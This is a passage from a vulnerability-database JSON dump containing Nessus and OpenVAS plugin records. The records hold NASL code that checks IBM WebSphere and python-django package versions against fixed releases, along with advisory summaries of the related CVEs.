attribute:\"synopsis\", \n value:\n\"The remote application server may be affected by multiple \nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM WebSphere Application Server 8.0 before Fix Pack 1 appears to be\nrunning on the remote host and is potentially affected by the \nfollowing vulnerabilities :\n\n - An open redirect vulnerability exists related to the\n 'logoutExitPage' parameter. This can allow remote\n attackers to trick users into requesting unintended\n URLs. (PM35701)\n\n - The administrative console can display a stack trace\n under unspecified circumstances and can disclose\n potentially sensitive information to local users.\n (PM36620)\n\n - An unspecified error exists that can allow cross-site \n request forgery attacks. (PM36734)\n\n - A token verification error exists in the bundled\n OpenSAML library. This error can allow an attacker to\n bypass security controls with an XML signature wrapping\n attack via SOAP messages. (PM43254)\n\n - A directory traversal attack is possible via unspecified\n parameters in the 'help' servlet. (PM45322)\n\n - The JavaServer Faces (JSF) application functionality \n could allow a remote attacker to read files because it\n fails to properly handle requests. (PM45992)\n\n - The HTTP server contains an error in the 'ByteRange'\n filter and can allow denial of service attacks when\n processing malicious requests. (PM46234)\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://www-01.ibm.com/support/docview.wss?uid=swg27022958\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www-01.ibm.com/support/docview.wss?uid=swg24030916\"\n );\n # PM46234\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21512087\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply Fix Pack 1 for version 8.0 (8.0.0.1) or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"websphere_detect.nasl\");\n script_require_ports(\"Services/www\", 8880, 8881);\n script_require_keys(\"www/WebSphere\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8880, embedded:0);\n\n\nversion = get_kb_item(\"www/WebSphere/\"+port+\"/version\");\nif (isnull(version)) exit(1, \"Failed to extract the version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\nif (version =~ \"^[0-9]+(\\.[0-9]+)?$\")\n exit(1, \"Failed to extract a granular version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (ver[0] == 8 && ver[1] == 0 && ver[2] == 0 && ver[3] < 1)\n{\n if (report_verbosity > 0)\n {\n source = get_kb_item_or_exit(\"www/WebSphere/\"+port+\"/source\");\n\n report = \n '\\n Source : ' + source + \n '\\n Installed version : ' + version +\n '\\n Fixed version : 8.0.0.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"The WebSphere Application Server \"+version+\" instance listening on port \"+port+\" is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-07-11T15:49:30", "description": "IBM WebSphere Application Server 6.1 before Fix Pack 41 appears to be running on the remote host. As such, it is potentially affected by the following vulnerabilities :\n\n - A cross-site scripting vulnerability via vectors related to web messaging. (CVE-2011-5065)\n\n - A cross-site scripting vulnerability in the Installation Verification Test (IVT) in the Install component.\n (CVE-2011-1362)\n\n - The SibRaRecoverableSiXaResource class in the Default Messaging Component does not properly handle a Service Integration Bus (SIB) dump operation involving the Failure Data Capture (FFDC) introspection code. This can allow local users to obtain sensitive information by reading the FFDC log file. (CVE-2011-5066)\n\n - A directory traversal vulnerability in the administration console that allows remote attackers to read arbitrary files on the host. (CVE-2011-1359)\n\n - A potential Denial of Service with malicious range requests. (CVE-2011-3192)\n\n - An unspecified vulnerability in the Web Services Security component when enabling WS-Security for a JAX-WS application. (CVE-2011-1377)", "cvss3": {"score": null, "vector": null}, "published": "2012-01-19T00:00:00", "type": "nessus", "title": "IBM WebSphere Application Server 6.1 < 6.1.0.41 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1359", "CVE-2011-1362", "CVE-2011-1377", "CVE-2011-3192", "CVE-2011-5065", "CVE-2011-5066"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/a:ibm:websphere_application_server"], "id": "WEBSPHERE_6_1_0_41.NASL", "href": "https://www.tenable.com/plugins/nessus/57607", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(57607);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\n \"CVE-2011-1359\",\n \"CVE-2011-1362\",\n \"CVE-2011-1377\",\n \"CVE-2011-3192\",\n \"CVE-2011-5065\",\n \"CVE-2011-5066\"\n );\n script_bugtraq_id(49362, 50310, 51559, 51560);\n\n script_name(english:\"IBM WebSphere Application Server 6.1 < 6.1.0.41 Multiple Vulnerabilities\");\n script_summary(english:\"Reads the version number from the SOAP port\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote application server is affected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"IBM WebSphere Application Server 6.1 before Fix Pack 41 appears to be\nrunning on the remote host. As such, it is potentially affected by\nthe following vulnerabilities :\n\n - A cross-site scripting vulnerability via vectors\n related to web messaging. (CVE-2011-5065)\n\n - A cross-site scripting vulnerability in the Installation\n Verification Test (IVT) in the Install component.\n (CVE-2011-1362)\n\n - The SibRaRecoverableSiXaResource class in the Default\n Messaging Component does not properly handle a Service\n Integration Bus (SIB) dump operation involving the\n Failure Data Capture (FFDC) introspection code. This\n can allow local users to obtain sensitive information by\n reading the FFDC log file. (CVE-2011-5066)\n\n - A directory traversal vulnerability in the\n administration console that allows remote attackers to\n read arbitrary files on the host. (CVE-2011-1359)\n\n - A potential Denial of Service with malicious range\n requests. (CVE-2011-3192)\n\n - An unspecified vulnerability in the Web Services\n Security component when enabling WS-Security for a\n JAX-WS application. (CVE-2011-1377)\"\n );\n script_set_attribute(attribute:\"see_also\",value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21404665\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www-01.ibm.com/support/docview.wss?uid=swg27009778\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg24031034\");\n\n script_set_attribute(attribute:\"solution\", value:\n\"If using WebSphere Application Server, apply Fix Pack 41 (6.1.0.41) or\nlater. \n\nOtherwise, if using embedded WebSphere Application Server packaged with\nTivoli Directory Server, apply the latest recommended eWAS fix pack.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"websphere_detect.nasl\");\n script_require_ports(\"Services/www\", 8880, 8881);\n script_require_keys(\"www/WebSphere\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8880, embedded:FALSE);\n\n\nversion = get_kb_item(\"www/WebSphere/\"+port+\"/version\");\nif (isnull(version)) exit(1, \"Failed to extract the version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\nif (version =~ \"^[0-9]+(\\.[0-9]+)?$\")\n exit(1, \"Failed to extract a granular version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (ver[0] == 6 && ver[1] == 1 && ver[2] == 0 && ver[3] < 41)\n{\n if (report_verbosity > 0)\n {\n source = get_kb_item_or_exit(\"www/WebSphere/\"+port+\"/source\");\n\n report =\n '\\n Source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 6.1.0.41' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n exit(0);\n}\nelse exit(0, \"The WebSphere Application Server \"+version+\" instance listening on port \"+port+\" is not affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:45", "description": "The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.", "cvss3": {}, "published": "2012-02-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2332-1 (python-django)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4140", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231070548", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070548", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2332_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2332-1 (python-django)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70548\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2332-1 (python-django)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202332-1\");\n script_tag(name:\"insight\", value:\"Paul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\nCVE-2011-4136\n\nWhen using memory-based sessions and caching, Django sessions are\nstored directly in the root namespace of the cache. When user data is\nstored in the same cache, a remote user may take over a session.\n\nCVE-2011-4137, CVE-2011-4138\n\nDjango's field type URLfield by default checks supplied URL's by\nissuing a request to it, which doesn't time out. A Denial of Service\nis possible by supplying specially prepared URL's that keep the\nconnection open indefinitely or fill the Django's server memory.\n\nCVE-2011-4139\n\nDjango used X-Forwarded-Host headers to construct full URL's. This\nheader may not contain trusted input and could be used to poison the\ncache.\n\nCVE-2011-4140\n\nThe CSRF protection mechanism in Django does not properly handle\nweb-server configurations supporting arbitrary HTTP Host headers,\nwhich allows remote attackers to trigger unauthenticated forged\nrequests.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your python-django packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.0.2-1+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django-doc\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:33", "description": "The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.", "cvss3": {}, "published": "2012-02-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2332-1 (python-django)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4140", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70548", "href": "http://plugins.openvas.org/nasl.php?oid=70548", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2332_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2332-1 (python-django)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\nCVE-2011-4136\n\nWhen using memory-based sessions and caching, Django sessions are\nstored directly in the root namespace of the cache. When user data is\nstored in the same cache, a remote user may take over a session.\n\nCVE-2011-4137, CVE-2011-4138\n\nDjango's field type URLfield by default checks supplied URL's by\nissuing a request to it, which doesn't time out. A Denial of Service\nis possible by supplying specially prepared URL's that keep the\nconnection open indefinitely or fill the Django's server memory.\n\nCVE-2011-4139\n\nDjango used X-Forwarded-Host headers to construct full URL's. This\nheader may not contain trusted input and could be used to poison the\ncache.\n\nCVE-2011-4140\n\nThe CSRF protection mechanism in Django does not properly handle\nweb-server configurations supporting arbitrary HTTP Host headers,\nwhich allows remote attackers to trigger unauthenticated forged\nrequests.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\n\nWe recommend that you upgrade your python-django packages.\";\ntag_summary = \"The remote host is missing an update to python-django\nannounced via advisory DSA 2332-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202332-1\";\n\nif(description)\n{\n script_id(70548);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2332-1 (python-django)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.0.2-1+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-django-doc\", ver:\"1.2.3-3+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:26:58", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1297-1", "cvss3": {}, "published": "2011-12-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for python-django USN-1297-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840830", "href": "http://plugins.openvas.org/nasl.php?oid=840830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1297_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for python-django USN-1297-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pall McMillan discovered that Django used the root namespace when storing\n cached session data. A remote attacker could exploit this to modify\n sessions. (CVE-2011-4136)\n\n Paul McMillan discovered that Django would not timeout on arbitrary URLs\n when the application used URLFields. This could be exploited by a remote\n attacker to cause a denial of service via resource exhaustion.\n (CVE-2011-4137)\n\n Paul McMillan discovered that while Django would check the validity of a\n URL via a HEAD request, it would instead use a GET request for the target\n of a redirect. This could potentially be used to trigger arbitrary GET\n requests via a crafted Location header. (CVE-2011-4138)\n\n It was discovered that Django would sometimes use a request's HTTP Host\n header to construct a full URL. A remote attacker could exploit this to\n conduct host header cache poisoning attacks via a crafted request.\n (CVE-2011-4139)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1297-1\";\ntag_affected = \"python-django on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1297-1/\");\n script_id(840830);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-09 10:52:57 +0530 (Fri, 09 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"1297-1\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\");\n script_name(\"Ubuntu Update for python-django USN-1297-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-1ubuntu0.2.10.10.3\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.1.1-2ubuntu1.4\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.5-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:43", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1297-1", "cvss3": {}, "published": "2011-12-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for python-django USN-1297-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1297_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for python-django USN-1297-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1297-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840830\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-09 10:52:57 +0530 (Fri, 09 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name:\"USN\", value:\"1297-1\");\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\");\n script_name(\"Ubuntu Update for python-django USN-1297-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.10|10\\.04 LTS|11\\.04)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1297-1\");\n script_tag(name:\"affected\", value:\"python-django on Ubuntu 11.04,\n Ubuntu 10.10,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Pall McMillan discovered that Django used the root namespace when storing\n cached session data. A remote attacker could exploit this to modify\n sessions. (CVE-2011-4136)\n\n Paul McMillan discovered that Django would not timeout on arbitrary URLs\n when the application used URLFields. This could be exploited by a remote\n attacker to cause a denial of service via resource exhaustion.\n (CVE-2011-4137)\n\n Paul McMillan discovered that while Django would check the validity of a\n URL via a HEAD request, it would instead use a GET request for the target\n of a redirect. This could potentially be used to trigger arbitrary GET\n requests via a crafted Location header. (CVE-2011-4138)\n\n It was discovered that Django would sometimes use a request's HTTP Host\n header to construct a full URL. A remote attacker could exploit this to\n conduct host header cache poisoning attacks via a crafted request.\n (CVE-2011-4139)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.3-1ubuntu0.2.10.10.3\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.1.1-2ubuntu1.4\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python-django\", ver:\"1.2.5-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n 